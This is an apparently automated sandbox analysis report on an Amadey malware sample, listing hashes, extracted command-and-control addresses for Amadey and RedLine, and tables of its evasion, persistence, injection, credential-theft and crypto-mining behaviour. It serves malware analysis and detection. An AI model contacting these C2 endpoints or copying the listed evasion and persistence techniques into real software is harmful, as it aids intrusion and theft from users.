amadey | c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da

Analysis

max time kernel
148s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
24-06-2024 02:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
Size

1.8MB
MD5

2e70b996132ba5d2caae18bc7479fd8c
SHA1

4569cc7318cc3cf4496f5293df0e5c4430b1c696
SHA256

c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da
SHA512

2cccfc7adb6d653497037d8742dd47cd4969445e277db1791df0c70a0a06b60a05c663f5001ec4cbbf8f845f7a01ff8d81f0451680791f2140640eebc33266f9
SSDEEP

49152:CGW73yMoyRJ92lnHylhoYAgl7APX9oP/EbNb2qCdx5:CVLn9nh3H7oisb0qCdr

Score

10^/10

amadey redline xmrig ama e76b71 livetraffic discovery evasion execution infostealer miner persistence spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

4.185.27.237:13528

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe	family_redline
behavioral2/memory/1644-41-0x0000000000570000-0x00000000005C0000-memory.dmp	family_redline
behavioral2/memory/2456-66-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5220-528-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-527-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-531-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-534-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-533-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-532-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-530-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-535-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5220-536-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

45 372 powershell.exe
46 372 powershell.exe
47 4784 powershell.exe
49 4784 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

5456 powershell.exe
2164 powershell.exe
5472 powershell.exe
372 powershell.exe
4784 powershell.exe
4212 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
45	372	powershell.exe
46	372	powershell.exe
47	4784	powershell.exe
49	4784	powershell.exe

pid	process
5456	powershell.exe
2164	powershell.exe
5472	powershell.exe
372	powershell.exe
4784	powershell.exe
4212	powershell.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplong.exec5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Executes dropped EXE 17 IoCs

Processes:

axplong.exeama.exegold.exelummac2.exeNewLatest.exeHkbsse.exeInstaller.exelegs.exe1.exeFirstZ.exetaskweaker.exe6.exeaxplong.exeHkbsse.exereakuqnanrkn.exeHkbsse.exeaxplong.exe

pid	process
1564	axplong.exe
1644	ama.exe
2668	gold.exe
1804	lummac2.exe
4796	NewLatest.exe
412	Hkbsse.exe
3792	Installer.exe
3584	legs.exe
468	1.exe
1396	FirstZ.exe
3828	taskweaker.exe
2940	6.exe
6096	axplong.exe
6120	Hkbsse.exe
5480	reakuqnanrkn.exe
6020	Hkbsse.exe
812	axplong.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplong.exeaxplong.exeaxplong.exec5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Wine	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/5220-522-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-528-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-527-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-531-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-534-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-533-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-532-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-530-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-525-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-526-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-524-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-523-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-535-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5220-536-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Installer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Installer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

85 pastebin.com
34 pastebin.com
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

5712 powercfg.exe
1384 powercfg.exe
376 powercfg.exe
2976 powercfg.exe
776 powercfg.exe
5684 powercfg.exe
5692 powercfg.exe
5700 powercfg.exe

flow	ioc
85	pastebin.com
34	pastebin.com

pid	process
5712	powercfg.exe
1384	powercfg.exe
376	powercfg.exe
2976	powercfg.exe
776	powercfg.exe
5684	powercfg.exe
5692	powercfg.exe
5700	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exereakuqnanrkn.exeFirstZ.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exeaxplong.exeaxplong.exe

pid process

3284 c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
1564 axplong.exe
6096 axplong.exe
812 axplong.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

gold.exelegs.exetaskweaker.exereakuqnanrkn.exe

description	pid	process	target process
PID 2668 set thread context of 2456	2668	gold.exe	RegAsm.exe
PID 3584 set thread context of 4824	3584	legs.exe	RegAsm.exe
PID 3828 set thread context of 6040	3828	taskweaker.exe	BitLockerToGo.exe
PID 5480 set thread context of 4488	5480	reakuqnanrkn.exe	conhost.exe
PID 5480 set thread context of 5220	5480	reakuqnanrkn.exe	explorer.exe

Drops file in Windows directory 2 IoCs

Processes:

NewLatest.exec5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe

description ioc process

File created C:\Windows\Tasks\Hkbsse.job NewLatest.exe
File created C:\Windows\Tasks\axplong.job c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5948 sc.exe
2676 sc.exe
2060 sc.exe
5548 sc.exe
5636 sc.exe
6064 sc.exe
6108 sc.exe
3024 sc.exe
5352 sc.exe
5728 sc.exe
4848 sc.exe
5888 sc.exe
4784 sc.exe
5916 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3336 3584 WerFault.exe legs.exe
1616 468 WerFault.exe 1.exe

description	ioc	process
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe
File created	C:\Windows\Tasks\axplong.job	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe

pid	process
5948	sc.exe
2676	sc.exe
2060	sc.exe
5548	sc.exe
5636	sc.exe
6064	sc.exe
6108	sc.exe
3024	sc.exe
5352	sc.exe
5728	sc.exe
4848	sc.exe
5888	sc.exe
4784	sc.exe
5916	sc.exe

pid	pid_target	process	target process
3336	3584	WerFault.exe	legs.exe
1616	468	WerFault.exe	1.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings powershell.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2544 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

952 schtasks.exe
4600 schtasks.exe
2480 schtasks.exe
2944 schtasks.exe
4044 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	powershell.exe

pid	process
2544	reg.exe

pid	process
952	schtasks.exe
4600	schtasks.exe
2480	schtasks.exe
2944	schtasks.exe
4044	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exepowershell.exepowershell.exepowershell.exeRegAsm.exeama.exemsedge.exe6.exemsedge.exemsedge.exeidentity_helper.exepowershell.exeaxplong.exeFirstZ.exepowershell.exereakuqnanrkn.exepowershell.exe

pid	process
3284	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
3284	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe
1564	axplong.exe
1564	axplong.exe
372	powershell.exe
372	powershell.exe
4212	powershell.exe
4212	powershell.exe
4212	powershell.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
4824	RegAsm.exe
4824	RegAsm.exe
1644	ama.exe
1644	ama.exe
1644	ama.exe
1644	ama.exe
2540	msedge.exe
2540	msedge.exe
2940	6.exe
2940	6.exe
2560	msedge.exe
2560	msedge.exe
380	msedge.exe
380	msedge.exe
5248	identity_helper.exe
5248	identity_helper.exe
5456	powershell.exe
5456	powershell.exe
5456	powershell.exe
6096	axplong.exe
6096	axplong.exe
1396	FirstZ.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
1396	FirstZ.exe
5480	reakuqnanrkn.exe
5472	powershell.exe
5472	powershell.exe
5472	powershell.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe
5480	reakuqnanrkn.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

powershell.exeRegAsm.exepowershell.exepowershell.exeama.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	4824	RegAsm.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeBackupPrivilege	4824	RegAsm.exe
Token: SeSecurityPrivilege	4824	RegAsm.exe
Token: SeSecurityPrivilege	4824	RegAsm.exe
Token: SeSecurityPrivilege	4824	RegAsm.exe
Token: SeSecurityPrivilege	4824	RegAsm.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	1644	ama.exe
Token: SeDebugPrivilege	5456	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeShutdownPrivilege	5712	powercfg.exe
Token: SeCreatePagefilePrivilege	5712	powercfg.exe
Token: SeShutdownPrivilege	5700	powercfg.exe
Token: SeCreatePagefilePrivilege	5700	powercfg.exe
Token: SeShutdownPrivilege	5684	powercfg.exe
Token: SeCreatePagefilePrivilege	5684	powercfg.exe
Token: SeShutdownPrivilege	5692	powercfg.exe
Token: SeCreatePagefilePrivilege	5692	powercfg.exe
Token: SeDebugPrivilege	5472	powershell.exe
Token: SeShutdownPrivilege	376	powercfg.exe
Token: SeCreatePagefilePrivilege	376	powercfg.exe
Token: SeShutdownPrivilege	1384	powercfg.exe
Token: SeCreatePagefilePrivilege	1384	powercfg.exe
Token: SeShutdownPrivilege	2976	powercfg.exe
Token: SeCreatePagefilePrivilege	2976	powercfg.exe
Token: SeShutdownPrivilege	776	powercfg.exe
Token: SeCreatePagefilePrivilege	776	powercfg.exe
Token: SeLockMemoryPrivilege	5220	explorer.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe
2560	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid process

2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe
2560 msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exelegs.exepowershell.execmd.exeHkbsse.exe

description	pid	process	target process
PID 3284 wrote to memory of 1564	3284	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe	axplong.exe
PID 3284 wrote to memory of 1564	3284	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe	axplong.exe
PID 3284 wrote to memory of 1564	3284	c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da.exe	axplong.exe
PID 1564 wrote to memory of 1644	1564	axplong.exe	ama.exe
PID 1564 wrote to memory of 1644	1564	axplong.exe	ama.exe
PID 1564 wrote to memory of 1644	1564	axplong.exe	ama.exe
PID 1564 wrote to memory of 2668	1564	axplong.exe	gold.exe
PID 1564 wrote to memory of 2668	1564	axplong.exe	gold.exe
PID 1564 wrote to memory of 2668	1564	axplong.exe	gold.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 2668 wrote to memory of 2456	2668	gold.exe	RegAsm.exe
PID 1564 wrote to memory of 1804	1564	axplong.exe	lummac2.exe
PID 1564 wrote to memory of 1804	1564	axplong.exe	lummac2.exe
PID 1564 wrote to memory of 1804	1564	axplong.exe	lummac2.exe
PID 1564 wrote to memory of 4796	1564	axplong.exe	NewLatest.exe
PID 1564 wrote to memory of 4796	1564	axplong.exe	NewLatest.exe
PID 1564 wrote to memory of 4796	1564	axplong.exe	NewLatest.exe
PID 4796 wrote to memory of 412	4796	NewLatest.exe	Hkbsse.exe
PID 4796 wrote to memory of 412	4796	NewLatest.exe	Hkbsse.exe
PID 4796 wrote to memory of 412	4796	NewLatest.exe	Hkbsse.exe
PID 1564 wrote to memory of 3792	1564	axplong.exe	Installer.exe
PID 1564 wrote to memory of 3792	1564	axplong.exe	Installer.exe
PID 3792 wrote to memory of 1980	3792	Installer.exe	cmd.exe
PID 3792 wrote to memory of 1980	3792	Installer.exe	cmd.exe
PID 1980 wrote to memory of 2480	1980	cmd.exe	schtasks.exe
PID 1980 wrote to memory of 2480	1980	cmd.exe	schtasks.exe
PID 1980 wrote to memory of 2944	1980	cmd.exe	schtasks.exe
PID 1980 wrote to memory of 2944	1980	cmd.exe	schtasks.exe
PID 1980 wrote to memory of 372	1980	cmd.exe	powershell.exe
PID 1980 wrote to memory of 372	1980	cmd.exe	powershell.exe
PID 1564 wrote to memory of 3584	1564	axplong.exe	legs.exe
PID 1564 wrote to memory of 3584	1564	axplong.exe	legs.exe
PID 1564 wrote to memory of 3584	1564	axplong.exe	legs.exe
PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
PID 3584 wrote to memory of 4824	3584	legs.exe	RegAsm.exe
